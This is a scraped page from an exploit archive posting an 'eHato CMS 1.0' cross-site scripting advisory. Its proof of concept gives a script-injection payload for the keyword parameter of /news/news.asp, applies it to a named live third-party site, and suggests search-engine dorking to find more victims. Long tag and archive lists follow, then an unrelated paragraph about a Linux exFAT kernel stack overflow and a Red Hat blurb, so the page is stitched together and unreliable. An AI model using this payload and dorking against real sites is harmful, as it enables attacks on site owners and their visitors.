SHA-256 | 288795acae37e9889703f9a9e13f4dc91e382a11ff20d9b6c617e50c574fefb2

Download | Favorite | View

**eHato CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : eHato CMS 1.0 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.ehato.com                                                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2[+] http://wtatcs.orgtw/news/news.asp?keyword=%25C3%25F6%25C1%25E4%25A6r%25B7j%25B4M'%22()%26%25<acx><ScRiPt%20>prompt(996317)</ScRiPt>&kind_id=&Page=2Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,924)
*   Arbitrary (16,191)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,343)
*   DoS (23,415)
*   Encryption (2,369)
*   Exploit (51,833)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,142)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,753)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,361)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,765)
*   Web (9,661)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,926)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,418)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,709)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,803)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eHato CMS 1.0 Cross Site Scripting

A flaw was found in the exFAT driver of the Linux kernel. The vulnerability exists in the implementation of the file name reconstruction function, which is responsible for reading file name entries from a directory index and merging file name parts belonging to one file into a single long file name. Since the file name characters are copied into a stack variable, a local privileged attacker could use this flaw to overflow the kernel stack.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

Tag

#linux